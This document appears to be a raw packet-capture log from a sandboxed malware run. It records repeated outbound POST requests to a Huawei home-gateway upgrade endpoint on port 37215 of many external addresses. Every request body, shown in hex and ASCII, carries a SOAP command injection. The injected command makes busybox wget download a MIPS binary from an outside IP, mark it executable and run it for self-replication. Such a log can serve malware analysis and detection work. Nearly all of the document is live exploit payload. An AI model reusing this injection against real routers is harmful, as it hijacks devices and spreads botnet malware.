3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1861192.168.2.1339234197.71.192.22937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547883987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1862192.168.2.134506288.245.50.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547962904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1863192.168.2.1351266157.186.234.25137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548106909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1864192.168.2.1360730197.159.50.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548121929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1865192.168.2.1337834197.50.80.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548139095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1866192.168.2.135043070.139.27.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548201084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1867192.168.2.135929241.118.4.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548202038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1868192.168.2.135304841.75.210.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548218012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1869192.168.2.1342830157.130.147.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548260927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1870192.168.2.1336618197.21.196.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548266888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1871192.168.2.1348522157.156.224.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548480988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
